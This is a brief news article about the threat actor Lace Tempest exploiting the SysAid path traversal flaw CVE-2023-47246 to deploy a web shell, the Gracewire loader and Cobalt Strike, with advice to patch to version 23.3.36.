Lace Tempest Exploits SysAid IT Support Software Vulnerability: Stay Informed with Shiv Telegram Media
2 min readTitle: Lace Tempest Exploits Zero-Day Flaw in SysAid Software to Deliver Ransomware
Introduction:
Lace Tempest, a notorious threat actor associated with the Cl0p ransomware, has recently targeted SysAid IT support software to carry out limited attacks. Exploiting a zero-day vulnerability, Lace Tempest successfully executed a malware loader for the Gracewire malware, compromising organizations’ security.
Body:
The attack, which involves the utilization of a zero-day flaw, marks another incident of Lace Tempest’s extensive criminal activity. Notably, previous zero-day flaws exploited by this threat actor encompassed vulnerabilities in MOVEit Transfer and PaperCut servers. These attacks serve as a chilling reminder of the ever-evolving techniques employed by cybercriminals.
The recently uncovered zero-day vulnerability, designated as CVE-2023-47246, centers around a path traversal flaw. This security loophole allows for the execution of code within on-premise installations, potentially leading to significant damage and data breaches.
SysAid, the software company affected by this exploit, has taken swift action to address the flaw. In version 23.3.36 of its software, SysAid has released a patch to mitigate this security vulnerability. Organizations utilizing SysAid are strongly advised to promptly apply the patches and conduct thorough scans of their environments to identify any signs of exploitation.
Lace Tempest’s attack methodology involved leveraging the compromised SysAid software to deliver a malware loader for the Gracewire malware. In this modus operandi, the threat actor uploaded a WAR archive containing a web shell and other malicious payloads to the SysAid Tomcat web service.
The purpose of the web shell is twofold: it establishes a backdoor access point to the compromised host and deploys a PowerShell script responsible for executing the Gracewire loader. Subsequently, a second PowerShell script erases all evidence of the exploitation, minimizing the risk of detection.
Further complicating the matter, Lace Tempest employed the MeshCentral Agent and PowerShell to download and execute Cobalt Strike, which is a legitimate post-exploitation framework. This technique adds an additional layer of sophistication and challenges the ability of organizations to detect malicious activities.
In light of these recent attacks, the FBI has issued a warning regarding the increasing trend of ransomware attackers targeting third-party vendors and legitimate system tools. The Silent Ransom Group (SRG), also known as Luna Moth, has been involved in extensive callback phishing data theft and extortion attacks. Through the use of phone numbers and legitimate system management tools, SRG tricks victims into installing malicious software, compromising files and network drives, exfiltrating data, and extorting companies.
Conclusion:
The cybersecurity landscape continues to evolve, with threat actors like Lace Tempest constantly seeking new avenues to exploit vulnerabilities. SysAid’s quick response in releasing a patch reflects the importance of promptly addressing zero-day flaws. To safeguard their systems, organizations using SysAid are urged to diligently apply the patches and thoroughly scan their environments for any signs of exploitation.
“Evil analyst. Explorer. Problem solver. Hardcore zombieaholic. Coffee fan. Writer. Bacon aficionado. Friendly reader.”